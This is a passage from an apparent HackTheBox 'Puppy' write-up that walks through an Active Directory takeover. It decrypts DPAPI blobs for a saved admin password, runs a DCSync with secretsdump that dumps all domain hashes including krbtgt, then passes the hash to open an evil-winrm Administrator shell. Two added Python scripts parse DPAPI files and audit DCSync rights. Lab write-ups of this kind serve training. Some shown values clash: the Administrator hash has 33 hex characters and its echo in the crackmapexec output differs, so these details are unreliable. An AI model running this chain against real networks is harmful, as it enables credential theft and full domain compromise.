-rwxrwxr-x 1 kali kali 414 Mar 8 10:54 credential_blob
-rwxrwxr-x 1 kali kali 740 Mar 8 10:40 masterkey_blob


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/share]
└─$ python3 /usr/share/doc/python3-impacket/examples/dpapi.py masterkey -file masterkey_blob -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)


Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

Now we decrypt the credential blob with the recovered masterkey:


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/share]
└─$ python3 /usr/share/doc/python3-impacket/examples/dpapi.py credential -f credential_blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

The blob held a saved domain credential for a second account:


user: steph.cooper_adm

password: FivethChipOnItsWay2025!
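The two dpapi.py runs above worked first time because the Protect folder held a single masterkey. A profile usually holds several (one per masterkey rotation), each named by its GUID, and a credential blob records which GUID it was encrypted under. The following is an added example, not part of the original writeup and not impacket's code: stdlib-only parsers for the two file layouts that check the copy is complete and pick the right masterkey before anything is decrypted. The layouts follow the public DPAPI reverse-engineering work implemented by dpapick and impacket; the sample bytes are constructed here (GUID and section lengths taken from the dpapi.py output above, payloads are dummies), not the real blobs.

```python
# Added example (not from the original writeup): sanity checks on DPAPI
# masterkey and credential files before handing them to dpapi.py.
import struct
import uuid

MK_FILE_HEADER_LEN = 128          # fixed header of a Protect\<SID>\<GUID> file
CRED_FILE_HEADER_LEN = 12         # Credentials\<hex> file: version, blob size, reserved
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# CryptoAPI ALG_ID values that appear in DPAPI structures
ALG_NAMES = {0x6603: "3DES", 0x6610: "AES-256", 0x8004: "SHA1", 0x800E: "SHA-512"}


def parse_masterkey_file(data: bytes) -> dict:
    """Parse the 128-byte masterkey file header and the masterkey section that follows.

    Header: version, 8 reserved, GUID as 36 UTF-16LE chars, 8 reserved, policy, then
    four QWORD lengths (masterkey, backup key, CREDHIST, domain key); the sections
    follow the header in that order, so the lengths must add up to the file size.
    """
    if len(data) < MK_FILE_HEADER_LEN:
        raise ValueError("too short to be a masterkey file")
    version, guid_utf16, policy, mk_len, bk_len, ch_len, dk_len = struct.unpack_from(
        "<I8x72s8xI4Q", data, 0)
    expected = MK_FILE_HEADER_LEN + mk_len + bk_len + ch_len + dk_len
    if len(data) != expected:
        raise ValueError(f"header says {expected} bytes, file is {len(data)}: truncated copy?")
    mk = data[MK_FILE_HEADER_LEN:MK_FILE_HEADER_LEN + mk_len]
    # masterkey section: version, 16-byte salt, PBKDF2 rounds, hash ALG_ID, cipher ALG_ID, ciphertext
    mk_version, salt, rounds, hash_alg, cipher_alg = struct.unpack_from("<I16sIII", mk, 0)
    return {
        "version": version,
        "guid": str(uuid.UUID(guid_utf16.decode("utf-16le"))),
        "policy": policy,
        "lengths": (mk_len, bk_len, ch_len, dk_len),
        "masterkey": {
            "version": mk_version, "salt": salt, "rounds": rounds,
            "hash": ALG_NAMES.get(hash_alg, hex(hash_alg)),
            "cipher": ALG_NAMES.get(cipher_alg, hex(cipher_alg)),
            "ciphertext_len": mk_len - 32,
        },
    }


def parse_credential_file(data: bytes) -> dict:
    """Parse the start of a credential file and return the masterkey GUID it needs.

    After the 12-byte file header comes a DPAPI_BLOB: version, provider GUID,
    masterkey version, masterkey GUID, flags, ... Only this prefix is needed.
    """
    file_version, size, _reserved = struct.unpack_from("<III", data, 0)
    blob = data[CRED_FILE_HEADER_LEN:CRED_FILE_HEADER_LEN + size]
    blob_version, provider, mk_version, mk_guid, flags = struct.unpack_from("<I16sI16sI", blob, 0)
    if uuid.UUID(bytes_le=provider) != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob: unexpected provider GUID")
    return {"file_version": file_version, "blob_version": blob_version,
            "masterkey_guid": str(uuid.UUID(bytes_le=mk_guid)), "flags": flags}


def matching_masterkey(cred: bytes, masterkeys: dict):
    """masterkeys: {file name: bytes}. Return the name whose GUID the blob references."""
    wanted = parse_credential_file(cred)["masterkey_guid"]
    for name, mk in masterkeys.items():
        if parse_masterkey_file(mk)["guid"] == wanted:
            return name
    return None


# Constructed sample data: same GUID and section lengths as the files from the box,
# dummy payload bytes (these are not the real blobs).
SAMPLE_GUID = "556a2412-1275-4ccf-b721-e6a0b4f90407"


def build_masterkey_file(guid: str, mk_len=136, bk_len=104, ch_len=0, dk_len=372) -> bytes:
    header = struct.pack("<I8x72s8xI4Q", 2, guid.encode("utf-16le"), 0,
                         mk_len, bk_len, ch_len, dk_len)
    section = struct.pack("<I16sIII", 2, b"\x11" * 16, 8000, 0x800E, 0x6610)
    section += b"\xaa" * (mk_len - len(section))
    return header + section + b"\x00" * (bk_len + ch_len + dk_len)


def build_credential_file(mk_guid: str) -> bytes:
    blob = struct.pack("<I16sI16sI", 1, DPAPI_PROVIDER_GUID.bytes_le, 1,
                       uuid.UUID(mk_guid).bytes_le, 0) + b"\x00" * 32   # rest of the blob omitted
    return struct.pack("<III", 1, len(blob), 0) + blob


if __name__ == "__main__":
    mk = build_masterkey_file(SAMPLE_GUID)
    cred = build_credential_file(SAMPLE_GUID)
    print(parse_masterkey_file(mk))
    print("credential needs masterkey", parse_credential_file(cred)["masterkey_guid"])
    print("use file:", matching_masterkey(cred, {SAMPLE_GUID: mk}))
```

On a real profile, read every file under Protect\<SID>\ except Preferred into the dict and call matching_masterkey with the credential file; the name it returns is the one to pass to `dpapi.py masterkey -file`. The size check also catches the common failure of a copy over SMB that stopped part way.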

We collect BloodHound data again as this user:


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns xx.xx.xx.xx

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)


INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains

INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 21 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 21S

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ zip bloodhound_results.zip bloodhound_results.json_20250517180922_*.json
adding: bloodhound_results.json_20250517180922_computers.json (deflated 74%)
adding: bloodhound_results.json_20250517180922_containers.json (deflated 93%)
adding: bloodhound_results.json_20250517180922_domains.json (deflated 77%)
adding: bloodhound_results.json_20250517180922_gpos.json (deflated 89%)
adding: bloodhound_results.json_20250517180922_groups.json (deflated 94%)
adding: bloodhound_results.json_20250517180922_ous.json (deflated 83%)
adding: bloodhound_results.json_20250517180922_users.json (deflated 93%)

BloodHound shows that steph.cooper_adm has DCSync rights, i.e. the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain. We use them to replicate the directory secrets with secretsdump and obtain the Administrator hash (a DCSync attack).
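The graph edge can be confirmed directly from the domain object's DACL, which is also the check a defender runs when auditing who can replicate. The script below is an added example, not part of the original writeup: it takes the SDDL of the domain head (for instance `(Get-Acl "AD:\DC=PUPPY,DC=HTB").Sddl` from a domain-joined PowerShell, or the nTSecurityDescriptor attribute read over LDAP and rendered as SDDL) and lists the principals that hold both replication rights. The SDDL string is constructed for the example and reuses the SIDs seen on the box; the extended-right GUIDs are the well-known Active Directory ones.

```python
# Added example (not from the original writeup): find DCSync-capable
# principals in the SDDL of the domain object.
import re

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = frozenset({DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL})

GENERIC_ALL = 0x10000000              # numeric form of the "GA" token
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100   # numeric form of the "CR" token

# "D:" + DACL flags + run of "(...)" ACEs; SACL ("S:") ends the run
DACL_RE = re.compile(r"D:([A-Z]*)((?:\([^()]*\))*)")
# ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")


def rights_tokens(rights: str) -> set:
    """Split an SDDL rights field into two-letter tokens, or decode a hex mask."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        tokens = set()
        if mask & GENERIC_ALL:
            tokens.add("GA")
        if mask & ADS_RIGHT_DS_CONTROL_ACCESS:
            tokens.add("CR")
        return tokens
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def dcsync_principals(sddl: str) -> set:
    """SIDs (or SDDL aliases such as BA, ED) holding both replication rights.

    A principal qualifies through GenericAll, through CR with an empty object
    GUID (every extended right), or through the two replication GUIDs. Only
    access-allowed ACEs are evaluated; deny ACEs would need order-aware
    evaluation and are ignored here.
    """
    m = DACL_RE.search(sddl)
    if not m:
        return set()
    granted = {}
    for ace_type, _flags, rights, obj_guid, _inh_guid, sid in ACE_RE.findall(m.group(2)):
        if ace_type not in ("A", "OA"):
            continue
        have = granted.setdefault(sid, set())
        tokens = rights_tokens(rights)
        if "GA" in tokens:
            have |= DCSYNC_RIGHTS
        elif "CR" in tokens:
            if obj_guid == "":
                have |= DCSYNC_RIGHTS
            elif obj_guid.lower() in DCSYNC_RIGHTS:
                have.add(obj_guid.lower())
    return {sid for sid, have in granted.items() if DCSYNC_RIGHTS <= have}


# Constructed sample DACL (not the real one from the box); SIDs reuse the RIDs seen above.
ADM = "S-1-5-21-1487982659-1829050783-2281216199-1111"   # steph.cooper_adm
USR = "S-1-5-21-1487982659-1829050783-2281216199-1107"   # steph.cooper
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    f"(OA;;CR;{DS_REPL_GET_CHANGES};;{ADM})"
    f"(OA;;CR;{DS_REPL_GET_CHANGES_ALL};;{ADM})"
    f"(OA;;CR;{DS_REPL_GET_CHANGES};;{USR})"     # only one of the pair: no DCSync
    "(A;;GA;;;BA)"                                # GenericAll covers everything
    f"(OA;;CR;{DS_REPL_GET_CHANGES};;ED)"
    f"(OA;;CR;{DS_REPL_GET_CHANGES_ALL};;ED)"
    "(D;;CR;;;AU)"                                # deny ACE, not evaluated
    "S:(AU;SA;WDWOSDDTWPCC;;;WD)"
)

if __name__ == "__main__":
    for sid in sorted(dcsync_principals(SAMPLE_SDDL)):
        print("can DCSync:", sid)
```

Administrators (BA) and Enterprise Domain Controllers (ED) are expected in the result on any domain; an ordinary user SID such as the 1111 account is the finding. Principals that inherit the rights through group membership do not show up by SID here, so expand group membership before concluding that nobody else can replicate.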

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py PUPPY.HTB/steph.cooper_adm:'FivethChipOnItsWay2025!'@xx.xx.xx.xx
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6


[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.

[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5
PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3afb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b419fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fcd48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f03582a9632da8acfc4d992899f3b64fe120e13
PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM
0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1..
0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z
0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.?
0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.\k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d775b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c596c0
Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56daf
Administrator:des-cbc-md5:20b9e03d6720150d
krbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45
krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851
krbtgt:des-cbc-md5:5876d051f78faeba
PUPPY.HTB\levi.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d585a6417ec
PUPPY.HTB\levi.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2f
PUPPY.HTB\levi.james:des-cbc-md5:efa8c2feb5cb6da8
PUPPY.HTB\ant.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac127e19f9b70fc
PUPPY.HTB\ant.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182
PUPPY.HTB\ant.edwards:des-cbc-md5:835826ef57bafbc8
PUPPY.HTB\adam.silver:aes256-cts-hmac-sha1-96:670a9fa0ec042b57b354f0898b3c48a7c79a46cde51c1b3bce9afab118e569e6
PUPPY.HTB\adam.silver:aes128-cts-hmac-sha1-96:5d2351baba71061f5a43951462ffe726
PUPPY.HTB\adam.silver:des-cbc-md5:643d0ba43d54025e
PUPPY.HTB\jamie.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc183e5a175f5fb2
PUPPY.HTB\jamie.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4
PUPPY.HTB\jamie.williams:des-cbc-md5:cb5840dc1667b615
PUPPY.HTB\steph.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f4c1790a11a6aa
PUPPY.HTB\steph.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93e
PUPPY.HTB\steph.cooper:des-cbc-md5:d35dfda40d38529b
PUPPY.HTB\steph.cooper_adm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468fff14f9481eccfc05ad9
PUPPY.HTB\steph.cooper_adm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62
PUPPY.HTB\steph.cooper_adm:des-cbc-md5:6231015d381ab691
DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
DC$:des-cbc-md5:7f044607a8dc9710
[*] Cleaning up...

We test the recovered Administrator NT hash against WinRM (pass-the-hash):

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec winrm xx.xx.xx.xx -u 'administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d775b' -d PUPPY.HTB
HTTP xx.xx.xx.xx 5985 xx.xx.xx.xx [*] http://xx.xx.xx.xx:5985/wsman
WINRM xx.xx.xx.xx 5985 xx.xx.xx.xx [+] PUPPY.HTB\administrator:bb0edc15e49ceb4120c7bd7e6e65d75b (Pwn3d!)

The hash alone gives us an evil-winrm session as Administrator:

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u administrator -H 'bb0edc15e49ceb4120c7bd7e6e65d775b'

Evil-WinRM shell v3.7


Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name


---- ------------- ------ ----
-ar--- 5/17/2025 9:56 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt


2ceb313f373dab54d3eb28e0ed2d6f762
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
